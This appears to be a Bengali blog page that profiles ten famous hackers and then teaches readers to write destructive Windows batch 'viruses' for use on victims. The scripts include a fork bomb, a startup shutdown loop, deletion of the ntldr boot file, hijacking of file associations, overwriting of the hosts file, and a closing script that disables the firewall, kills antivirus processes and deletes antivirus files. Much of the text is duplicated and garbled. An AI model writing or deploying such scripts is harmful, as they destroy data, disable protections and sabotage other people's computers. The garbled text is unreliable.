| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
|
IMPORTENT SOME SOFTWARE FREE DOWNLOAD
WORLD TOP 10 HACKER DETAILS..
%%%%হ্যাকার
নাম শুনলেই প্রথমেই যে জিনিসটা আমার চোখের সামনে ভেসে আসে তা হল নিজের
সাইটে একটা কালো ডিফেস পেজ।যদিও কেবল ওয়েবসাইট হ্যাক করাই হ্যাকারের কাজ
না।
আরও অনেক কাজ আছে।এবার মূল কথায় আসা যাক।টাইটেলে আমি ‘ব্ল্যাক হ্যাট
হ্যাকার’ শব্দটা ব্যবহার করেছি।আপনারা অনেকেই হয়তো জানেন এই ব্ল্যাক হ্যাট
হ্যাকার ,যারা জানেন না তাদের জন্য হ্যাকার সম্পর্কে কিছু কথা প্রথমে বলে
নিই।
হ্যাকার কে?: সাধারন বক্তব্য যারা হ্যাকিং করে তারাই হ্যাকার।তাহলে হ্যাকিংটা কি?হ্যাকিং একটি প্রক্রিয়া যেখানে কেউ কোন বৈধ অনুমতি ছাড়া কোন কম্পিউটার বা কম্পিউটার নেটওয়ার্কে প্রবেশ করে। যারা এটা করে তারাই হচ্ছে হ্যাকার।
হ্যাকারের প্রকারভেদঃ হ্যাকারদের চিহ্নিত করা হয় Hat বা টুপি দিয়ে।হ্যাকারদের ৩ ভাগে বিভক্ত করা হয়।
Black Hat Hacker: সবচেয়ে ভয়ংকর হ্যাকার হচ্ছে এ Black hat hacker । এরা কোন একটি সিকিউরিটি সিস্টেমের ত্রুটিগুলো বের করলে দ্রুত ঐ ত্রুটি কে নিজের স্বার্থে কাজে লাগায়। ঐ সিস্টেম নষ্ট করে। বিভিন্ন ভাইরাস ছড়িয়ে দেয়। ভবিষ্যতে নিজে আবার যেন ঢুকতে পারে সে পথ রাখে। সর্বোপরি ঐ সিস্টেমের অধীনে যে সকল সাব-সিস্টেম রয়েছে সে গুলোতেও ঢুকতে চেষ্টা করে।হ্যাকার বলতে মূলত সবাই এদেরকেই বুঝিয়ে থাকে।
Grey Hat Hacker: এরা হচ্ছে দুমুখো সাপ।এরা যখন একটি একটি সিকিউরিটি সিস্টেমের ত্রুটি গুলো বের করে তখন সে তার মন মত কাজ করবে। তার মন ঐ সময় কি চায় সে তাই করবে। সে ইচ্ছে করলে ঐ সিকিউরিটি সিস্টেমের মালিকে ত্রুটি জানাতেও পারে অথবা ইনফরমেশনগুলো নষ্ট ও করতে পারে। আবার তা নিজের স্বার্থের জন্য ও ব্যবহার করতে পারে।
কোড ছাড়ার মূল উদ্দেশ্য ছিল ইন্টারনেটের সাথে কতগুলো কম্পিউটার সংযুক্ত আছে তা বের করা। তবে তাকে সনাক্ত করতে পুলিশের বেশি সমস্যা হয়নি কারণ এই ভাইরাস ছাড়ার প্রায় একমাস পূর্বে তিনি চ্যাটিং এর সময় এই ভাইরাস এর ব্যাপারে আভাস দিয়েছিলেন এইটি ছিল তার ভুল। তার ভাষ্যমতে , তার ভাইরাস কতৃক আক্রান্ত কম্পিউটার এর কোন ক্ষতি হবে না। মরিস বর্তমানে বৈদ্যুতিক প্রকৌশল ও কম্পিউটার বিজ্ঞান ম্যাসাচুসেটস ইনস্টিটিউট অব টেকনোলজি (আইটি) বিভাগে কাজ করছেন।
সেরা ১০ হ্যাকারের একজন আপনিও হতে পারেন।শুধু প্রয়োজন ইচ্ছা ও অধ্যাবসায়।তবে আপনি Black Hat হবেন, না White hat হবেন সেটা আপনার ব্যাপার।
হ্যাকার কে?: সাধারন বক্তব্য যারা হ্যাকিং করে তারাই হ্যাকার।তাহলে হ্যাকিংটা কি?হ্যাকিং একটি প্রক্রিয়া যেখানে কেউ কোন বৈধ অনুমতি ছাড়া কোন কম্পিউটার বা কম্পিউটার নেটওয়ার্কে প্রবেশ করে। যারা এটা করে তারাই হচ্ছে হ্যাকার।
হ্যাকারের প্রকারভেদঃ হ্যাকারদের চিহ্নিত করা হয় Hat বা টুপি দিয়ে।হ্যাকারদের ৩ ভাগে বিভক্ত করা হয়।
- White Hat Hacker
- Black Hat hacker
- Grey Hat Hacker
Black Hat Hacker: সবচেয়ে ভয়ংকর হ্যাকার হচ্ছে এ Black hat hacker । এরা কোন একটি সিকিউরিটি সিস্টেমের ত্রুটিগুলো বের করলে দ্রুত ঐ ত্রুটি কে নিজের স্বার্থে কাজে লাগায়। ঐ সিস্টেম নষ্ট করে। বিভিন্ন ভাইরাস ছড়িয়ে দেয়। ভবিষ্যতে নিজে আবার যেন ঢুকতে পারে সে পথ রাখে। সর্বোপরি ঐ সিস্টেমের অধীনে যে সকল সাব-সিস্টেম রয়েছে সে গুলোতেও ঢুকতে চেষ্টা করে।হ্যাকার বলতে মূলত সবাই এদেরকেই বুঝিয়ে থাকে।
Grey Hat Hacker: এরা হচ্ছে দুমুখো সাপ।এরা যখন একটি একটি সিকিউরিটি সিস্টেমের ত্রুটি গুলো বের করে তখন সে তার মন মত কাজ করবে। তার মন ঐ সময় কি চায় সে তাই করবে। সে ইচ্ছে করলে ঐ সিকিউরিটি সিস্টেমের মালিকে ত্রুটি জানাতেও পারে অথবা ইনফরমেশনগুলো নষ্ট ও করতে পারে। আবার তা নিজের স্বার্থের জন্য ও ব্যবহার করতে পারে।
এছাড়াও আরো কয়েক ধরনের হ্যাকার রয়েছে।যেমনঃ Ethical hacker,Script Kiddie,Elite Hacker ইত্যাদি।
হ্যাকারদের সাধারন পরিচিতি তো বললাম,এবার তাহলে আসুন বিশ্বের সেরা ১০ জন ব্ল্যাক হ্যাট হ্যাকারদের সাথে পরিচিত হই।
হ্যাকারদের সাধারন পরিচিতি তো বললাম,এবার তাহলে আসুন বিশ্বের সেরা ১০ জন ব্ল্যাক হ্যাট হ্যাকারদের সাথে পরিচিত হই।
01.Gary McKinnon:
সেরা হ্যাকারদের মধ্যে যার নাম প্রথমেই মনে আসে তিনি Solo হিসেবে পরিচিত।স্কটিশ কন্সপিরেসির এই থিয়োরিস্ট U.S এর এয়ার ফোর্স, আর্মি, ডিপার্টমেন্ট অব ডিফেন্স, নাসা, নেভির মত বড় বড় নেটওয়ার্কে অবৈধভাবে প্রবেশ করে বিশ্বরেকর্ড করেন। গ্লোবাল এনার্জি ক্রাইসিস সমাধানের নিমিত্তে এগুলো থেকে তিনি এলিয়েন স্পেসক্র্যাফট এর যাবতীয় প্রমাণাদি চুরি ও নষ্ট করেন যা ইউএস আদালতের ভাষ্যমতে প্রায় $৭০০০,০০০ ক্ষতির সমতুল্য। ২০০২ সালে ইউ এস আর্মির সার্ভার স্ক্রিনে “Your security system is crap,” it read. “I am Solo. I will continue to disrupt at the highest levels.” এই ম্যাসেজ দেখা দিয়েছিল যা তিনিই করেছিলেন। Large scale hackings এর সূচনা করার মধ্যে দিয়ে তিনি ইউ এস আর্মির সার্ভার এ হামলা করেন। হামলার কারণ হিসাবে উল্লেখ করতে তিনি বলেন, “ আমার বিশ্বাস ছিল তারা এমন কিছু তথ্য সেখানে লুকিয়ে রেখেছিল যা সকলের জানা দরকার।02.Kevin Mitnick:
বিশ্বের সুপরিচিত ও ভয়ংকর হ্যাকারদের মধ্যে মিটনিক একজন যিনি আখ্যায়িত হয়েছেন The most wanted computer criminals in United States এবং The most dangerous hacker in the World হিসেবে। টাচ টোন এবং ভয়েস কন্ট্রোলের মাধ্যমে সেলফোন ব্যবহার করে মিটনিক কম্পিউটার নেটওয়ার্ক এর আক্সেস নিতেন। মটোরোলার মত বৃহৎ কম্পিউটার নেটওয়ার্ক এই জিনিয়াসের দ্বারা হ্যাকড হয়েছিল যা তাকে সেই দিনগুলিতে আলোচনার কেন্দ্রবিন্দুতে নিয়ে এসেছিল।03.Jonathan James:
এবার যার কথা বলব তার কাহিনী শুনে আপনারও হ্যাকার হতে ইচ্ছে করবে।১৬ বছর বয়সের আমেরিকান এই কিশোর হ্যাকিংকে চ্যালেঞ্জ হিসেবে গ্রহন করেছিলেন যা তাকে ১৬ বারেরও বেশি কারাগারে নিয়ে গিয়েছিল। ইউএস ডিফেন্স ডিপার্টমেন্টের ওয়েবসাইট তার এই চ্যালেঞ্জের মধ্যে পড়েছিল। ইউ এস ডিফেন্স সার্ভার থেকে তিনি প্রায় তিন হাজার অতিগোপন বার্তা ও অনেক ব্যবহারকারীর পার্সওয়ার্ড চুরি করেছিলেন। ১.৭ মিলিয়ন ডলারের নাসা সফটওয়্যার চুরি করে নাসার সার্ভার ও সিস্টেমকে শাটডাউন করতে বাধ্য করেছিলেন তিনি। চিন্তা করতে পারেন নাসার সিস্টেম শাটডাউ! সাইবারস্পেসে তার এই অস্বাভাবিক ব্যবহার জেমসকে ১০ বছর কম্পিউটার স্পর্শ করা থেকে বিরত রাখতে বাধ্য করেছিল!!!04. Adrian Lamo:
মাইক্রোসফট, ইয়াহু, সিটিগ্রুপ, ব্যাংক অব আমেরিকা, সিঙ্গুলার এবং দ্য নিউইয়র্ক টাইমস এর কম্পিউটার নেটওয়ার্ক ব্রেকডাউন করে Lamo সর্বপ্রথম বিশ্বরেকর্ড করেন। হোমলেস হ্যাকার নামে পরিচিত বিখ্যাত এই হ্যাকারকে ২০০২ সালে New York আদালতের নির্দেশে এই আচরনের কারনে ৬৫,০০০ ইউএস ডলার জরিমানা গুনতে হয়েছিলেন। ২০১০ সালে Bradley Manning কতৃক বাগদাদে বিমান আক্রমনের ভিডিও উইকিলিকস এর মাধ্যমে তিনিই প্রকাশ করেন। বর্তমানে তিনি একটি অলাভজনক প্রতিষ্ঠানের সাথে কাজ করছেন।05.George Hotz:
২০১১ সালে সনি এরিকসন এর প্লেষ্টেশন জেলব্রেক করে তিনি পরিচিতি লাভ করেন। তবে তার বিচার কার্য চলাকালীন সময়ে তার সহযোগীরা তার তৈরি পদ্ধতি জনসমক্ষে প্রকাশ করে যার ফলশ্রুতিতে এনিনমাস হ্যাকারগ্রুপ সনির সার্ভারে হামলা করে প্রায় ৭৭ মিলিয়ন গ্রাহকের তথ্য চুরি করে। তবে তিনি এ বিষয়ে তার সম্পৃক্ততায় অস্বীকৃতি জানায়। তিনি বলেন “ একটি সার্ভার এ আক্রমন করে শুধু ইজজার এর তথ্য চুরি করার মতো কাজ তিনি হলে করতেন না কারণ এটি মোটেও সন্তোষজনক নয় অন্তত তার জন্য।06. David Smith:
Smith পরিচিতি লাভ করে তার Melissa নামক ই-মেইল ভাইরাস তৈরির মাধ্যমে।তার ভাষ্যমতে এই ভাইরাস ভিকটিম এর কোন ক্ষতি করে না তবে কোন ভিকটিম এর লিস্টে থাকা প্রায় সকল ই-মেইল এ ভাইরাস প্রেরণ করে। এ জন্য তাকে আমেরিকার ফেডারেল প্রিজনে রাখা হয় এবং তিনিই একমাত্র ব্যক্তি যাকে ইমেইল ভাইরাস আবিষ্কারের জন্য জেলে পাঠানো হয়।07.Michael Calce:
২০০০ সালে ইয়াহু, আমাজন,ডেল, ইবে,এবং সিএনএন এর নেটওয়ার্কে আক্রমন করে এই হ্যাকার আলোচনার শীর্ষে উঠে আসেন। তৎকালীন সময়ে ইয়াহু ছিল শীর্ষ সার্চ ইঞ্জিন। কিন্তু আর আক্রমনের কবলে ইয়াহুর সার্ভার ১ ঘন্টার জন্য বন্ধ হয়ে যায়। অন্যান্য হ্যাকার এর মতো তিনি ও তার হ্যাকার গ্রুপ ইয়াহুর সার্ভার পুরোপুরি নিয়ন্ত্রনে আনতে সক্ষম হন। ২০০১ সালে Montreal Youth Court এর নির্দেশে তার আট মাসের জেল হয়।08. Robert Tappan Morris:
১৯৮৮ সালে worm তৈরি করে Robert Morris ইন্টারনেটে থাকা এক দশমাংশ কম্পিউটার এ আক্রমন করেন এবং প্রায় ৬০০০ হাজার এরও অধিক কম্পিউটার এ তার নিয়ন্ত্রন প্রতিষ্ঠা করেন।মাত্র ৯৯ লাইনের কোড লিখে শত শত কম্পিউটার আক্রমণ করেন।পরবর্তিতে এই কোড মরিস ওয়ার্ম নামে পরিচিতি লাভ করে। ধরা পরার পর মরিস আত্মপক্ষ সমর্থন করে বলে, সে কোন খারাপ কাজ করে নি।কোড ছাড়ার মূল উদ্দেশ্য ছিল ইন্টারনেটের সাথে কতগুলো কম্পিউটার সংযুক্ত আছে তা বের করা। তবে তাকে সনাক্ত করতে পুলিশের বেশি সমস্যা হয়নি কারণ এই ভাইরাস ছাড়ার প্রায় একমাস পূর্বে তিনি চ্যাটিং এর সময় এই ভাইরাস এর ব্যাপারে আভাস দিয়েছিলেন এইটি ছিল তার ভুল। তার ভাষ্যমতে , তার ভাইরাস কতৃক আক্রান্ত কম্পিউটার এর কোন ক্ষতি হবে না। মরিস বর্তমানে বৈদ্যুতিক প্রকৌশল ও কম্পিউটার বিজ্ঞান ম্যাসাচুসেটস ইনস্টিটিউট অব টেকনোলজি (আইটি) বিভাগে কাজ করছেন।
09.Albert Gonzalez:
প্রথম পরিচিতি লাভ করেন ATM ও ক্রেডিট কার্ডের তথ্য চুরির মাধ্যমে। তিনি বর্তমান সময় পর্যন্ত সবচেয়ে বেশী ক্রেডিট কার্ড এর তথ্য চুরি করে রেকর্ড করেন।২০০৫ থেকে ২০০৭ সাল পর্যন্ত সে এবং তার সহযোগীরা প্রায় ১৭০ মিলিয়ন ক্রেডিট কার্ড বিক্রি করে। . Gonzalez SQL পদ্ধতি ব্যবহার করে malware backdoors তৈরি করে বিভিন্ন কর্পোরেট সার্ভিস এ প্রবেশ করত এবং packet-sniffing (বিশেষত ARP Spoofing) এর মাধ্যমে কম্পিউটার নেটওয়ার্কে প্রবেশ করে তথ্য চুরি করত। গ্রফতার হওয়ার সময় তার কাছ থেকে $১.৬ মিলিয়ন ডলার বাজেয়াপ্ত করা হয়।যার মধ্যে ১.১ মিলিয়ন উদ্ধার করা হয় তার বাড়ির উঠান খুড়ে পলিথিনের ব্যাগ থেকে।২০১০ সালে তার ১০ বছরের জেল হয়।10.Kevin Poulsen:
Dark Dante(Code Name) নামে পরিচিত Kevin Poulsen আমেরিকান হ্যাকার FBI ডাটাবেজ ও স্টেশন ফোন লাইন্স হ্যাক করে আলোচনার ঝড় তুলেছিলেন। ভয়ঙ্কর এই হ্যাকার LA রেডিও স্টেশন হ্যাক করে পরিচিতি লাভ করে। পরে তার বিরুদ্ধে অভিযোগ গঠন করা হলে তিনি আত্মগোপন করেন। তবে ১৯৯১ সালের দিকে সে FBI এর হাতে ধরা পড়ে।তার বিরুদ্ধে আনিত অভিযোগের মধ্যে কম্পিউটার কেলেঙ্কারি, অর্থ পাচার, সহ তথ্য চুরির অভিযোগ সে স্বীকার করেন। যার ফলে তার ৫১ মাসের জেল হয়। এটি পৃথিবীতে তৎকালীন সময় পর্যন্ত হ্যাকিং এর দায়ে সবচেয়ে বড়(দীর্ঘতম) শাস্তি। বর্তমানে তিনি Wired News এর সাংবাদিক ও সিনিয়র ইডিটর হিসেবে কর্মরত আছেন।সেরা ১০ হ্যাকারের একজন আপনিও হতে পারেন।শুধু প্রয়োজন ইচ্ছা ও অধ্যাবসায়।তবে আপনি Black Hat হবেন, না White hat হবেন সেটা আপনার ব্যাপার।
HOW TO CREATED VIRUS........
এখানে আমি কোন স্ক্রিনশট দেব না কারন আমি নিজেও অনেক সাইট পড়ে এবং অভিজ্ঞতা থেকে এটি লিখছি ...............
What are Batch Files ?
একটা উদাহরণ দিয়ে শুরু করা যাক । star থেকে রান এ গিয়ে cmd ওপেন করুন । এখন আপনার ডাইরেক্টরি "Desktop" থেকে সরাতে "Cd Desktop" টাইপ করুন উদ্ধরন চিহ্ন ছাড়া । এখন নিচের তিনটি কম্যান্ড এক এক করে লিখুন ।
1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'লক্ষ্য করুন আমরা কি করলাম । প্রথমে x ফোল্ডার তৈরি করলাম । এরপর এর ভেতরে গিয়ে y ফোল্ডার তৈরি করলাম। এরপর x ডিলিট করে দিলাম ।
এখন এই কাজ টাই একটু অন্য ভাবে করুন । এগুলকে নিয়ে নোটপ্যাড এ কপি করে সেভ করুন । নাম এর শেষ এ .bat থাকতে হবে ।
তাহলে দেখবেন উপরে বর্ণিত কাজ টা হবে ।
তাহলে বোঝা গেল batch হচ্ছে এমন ধরনের ফাইল টাইপ যা হল তার মধ্যে দেয়া কম্যান্ড গুলকে অনুসরন করে কাজ করে । আপনি হয়তবা মনে করবেন Malware বা ছোট Trojan বানান খুব কঠিন । সেরকম না । কিন্তু যে বানাবে তার মানসিকতাই আসল
What can batch viruses do ?
প্রশ্ন হল এদের দিয়ে কি কি কাজ করা যায় ??
এদের দিয়ে অনেক কাজ করা যায় যেমন ধরুন ডাটা ডিলিট করা। ড্রাইভ ফরমেট , তথ্য চুরি , ভাইরাস ইঞ্জেক্ট, পারফর্মেন্স বাধা গ্রস্থ করা । খামাকা মানুষ কে বিপদে ফেলা এসব............
এখন কিছু উদাহরণ প্র্যাকটিস করা যাক। নিচের কোড গুলো পিসিতে সেভ করে দেখুন ।
1. Application Bomber
@echo off // It instructs to hide the commands when batch files is executed
//loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
প্রথমে
আপনাকে @echo off দিয়ে ফাইল কে অন্য ফাইল থেকে আলাদা করতে হবে । এরপর এই
সব একসাথে বা আলাদা আলাদাভাবে নোটপ্যাড এ লিখে .bat দিয়ে যে কোন নামে সেভ
করুন । এগুলো ক্ষতিকর না । আপনি ওপেন করতে পারেন । তবে এভাবেই কমান্ড
কম্বাইন্ড করে victim কে বিরক্ত করা হয় ।
2. Folder flooder
@echo off
md %random% // makes directory/folder.
goto x%random% এর মাধ্যমে বলা হয়েছে যে কোন ধনাত্মক সংখ্যা প্রিন্ট করতে । যার ফলে এটি ওপেন করলে যে কোন ড্রাইভ এ এটি ফোল্ডার বানাতেই থাকবে । এটি পিসিতে ওপেন করবেন না ।
3.User account flooder
@echo off
net user %random% /add //create user account
goto x
এটি যেকোনো নাম্বার বসিয়ে উইন্ডোজ এ ইউযার account তৈরি করতে থাকবে
4.Shutdown Virus
shutdown -s -t 00 //
এই কোড এর মাধ্যমে পিসি সাথে সাথে বন্ধ হয়ে যাবে । মনে হবে হার্ডডিস্ক ফেইল করেছে
কিন্তু
এটি একবার এই হবে আপনি যদি এটি চালু রাখতে চান তবে “C:\Documents and
Settings\Administrator\Start Menu\Programs\Startup” এবং “C:\Documents
and Settings\All Users\Start Menu\Programs\Startup”তে পেস্ট করতে হবে ।
যার ফলে পিসি ছাড়া হলে বারবার এটি হতে থাকবে । আপনাকে আই দুই ডিরেক্টরি
থেকে ফাইল দিলিট করে এটি বন্ধ করতে হবে ।এই কোড এর মাধ্যমে পিসি সাথে সাথে বন্ধ হয়ে যাবে । মনে হবে হার্ডডিস্ক ফেইল করেছে
5. Deleting boot filesGoto C drive in Win XP , Tools->Folder Option->View
এখন 'Show hidden files and folders'. এ চেক দিয়ে বের হয়ে আসুন । এখন আপনি অপারেটিং সিস্টেম এর ফাইল দেখতেও পাবেন । 'ntldr' নামে একটি ফাইল আছে যা উইন্ডোজ এর বূট নিয়ন্ত্রন করে . এখন একে ডিলিট করতে একটা ব্যাচ ফাইল বানাব
attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr //delete ntldr file
এটি রান করার সাথে সাথে ফাইল টি ডিলিট হয়ে যাবে । আপনি নিজের পিসি তে এটি রান করবেন না ।
5. Fork Bomb
%0|%0 //Its percentage zero pipe percentage zero
এই কোড ফাইল ম্যানেজার কে বলবে গুন হতে । যার ফলে আপনার অজান্তে পিসিতে ক্যাশ মেমরি বেড়ে যাবে শেষ এ পিসি হ্যাঁ ং হবে
6. Extension Changer
@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything
প্রতটি
ফাইল এর আলাদা ফরমেট আছে যেমন .exe, .jpeg, .mkv ইত্যাদি । এই কোড
চালাবার সাথে সাথে সব ফরমেট ও লট পালট হয়ে যাবে এবং । প্রোগ্রাম রি
ইন্সটাল করতে হবে । তাই অন্তত পিসি তে এটি চলাবেন না ।
7. DNS Poisoning
আপনার
উইন্ডোজ এ ‘hosts’ নামে ফাইল আছে এখানে
c:\windows\system32\drivers\etc. আমরা এখানে একটি আইপি এবং ওয়েবসাইট বসিয়ে
দিতে পারি . তাহলে আমাদের ব্রাউযার সেই ওয়েবসাইট এ আমাদের নিয়ে যাবে .
@echo off
echo xxx.xxx.xxx.xxx http://www.anything.com > C:\windows\system32\drivers\etc\hosts //এই কম্যান্ড তাহলে আইপি এবং ওয়েবসাইট কে host এ প্রিন্ট করবে
xxx.xxx.xxx.xxx এবং http://www.anything.com এ আপনার কাঙ্খিত আইপি এবং ওয়েবসাইট বসাবেন । এরফলে যে এটি ওপেন করবে সে সেই সাইট ছাড়া তার ব্রাউযার অন্য সাইট দেখতে পাবেনা ।
Limitations of Batch Viruses -:
কিন্তু কিছু সমস্যা আছে ...............
যে কেউ এটি ওপেন না করে নোট প্যাড দিয়ে ভিউ করতে পারে । যার ফলে সে সতরক হয়ে যাবে ।
এটি ভাইরাস হলে আন্টিভাইরাস ও উইন্ডোজ AlaRt দেবে । এর সমাধান আছে ।
কিন্তু আমি বলছি না । খারাপ পারপাসে ব্যাবহার হতে পারে ।
একটা অফ টপিক । ভাল না লাগলে এড়িয়ে যান
কিন্তু কিছু সমস্যা আছে ...............
যে কেউ এটি ওপেন না করে নোট প্যাড দিয়ে ভিউ করতে পারে । যার ফলে সে সতরক হয়ে যাবে ।
এটি ভাইরাস হলে আন্টিভাইরাস ও উইন্ডোজ AlaRt দেবে । এর সমাধান আছে ।
কিন্তু আমি বলছি না । খারাপ পারপাসে ব্যাবহার হতে পারে ।
একটা অফ টপিক । ভাল না লাগলে এড়িয়ে যান
এ পর্যন্ত যারা আমার বকবক শুনেছেন তাদের ধারনা হয়েছে এগুলো দিয়ে শুধু আযেবাযে কাজ করা যায় । তা না ......
আমি একটা ছোটখাটো batch antivirus এর কো ড করেছি ।
@echo off
color cb
/////////Rashed Hasan /////////
cls
echo ===============
echo [ Batch-Master]
echo ===============
echo If There's no message ,You are protected.
set /p a=Enter a batch file to scan:
for /f %%x in (
'findstr /i /m "virus r.i.p byebye HaHaHa Hacked Hack" %a%.bat'
) do (
if /i %%x equ %a%.bat (
for /f %%z in (
'findstr /i /b /m "tskill del copy shutdown ipconfig ren reg" %a%.bat'
) do (
if /i %%z equ %a%.bat (
cls
echo Virus Detected!!
echo %a%.bat was deleted....
del %a%.bat & pause >nul
)
)
)
)
pause >nul
_______ BCA ___________
এটি আপনার পিসি তে zekono kichu .bat নামে সেভ করুন । এটিতে আপনি যে কোন .bat ফাইল এর নাম লিখে স্ক্যান করতে পারবেন ।
আমি একটা ছোটখাটো batch antivirus এর কো ড করেছি ।
@echo off
color cb
/////////Rashed Hasan /////////
cls
echo ===============
echo [ Batch-Master]
echo ===============
echo If There's no message ,You are protected.
set /p a=Enter a batch file to scan:
for /f %%x in (
'findstr /i /m "virus r.i.p byebye HaHaHa Hacked Hack" %a%.bat'
) do (
if /i %%x equ %a%.bat (
for /f %%z in (
'findstr /i /b /m "tskill del copy shutdown ipconfig ren reg" %a%.bat'
) do (
if /i %%z equ %a%.bat (
cls
echo Virus Detected!!
echo %a%.bat was deleted....
del %a%.bat & pause >nul
)
)
)
)
pause >nul
_______ BCA ___________
এটি আপনার পিসি তে zekono kichu .bat নামে সেভ করুন । এটিতে আপনি যে কোন .bat ফাইল এর নাম লিখে স্ক্যান করতে পারবেন ।
World Top virus code(any hard disk crash))
Just copy the code and paste the notepad than save as """pleasehack.bat"" mind it ".bat"
than save.carefully don"t open bat file.
@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --
than save.carefully don"t open bat file.
@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
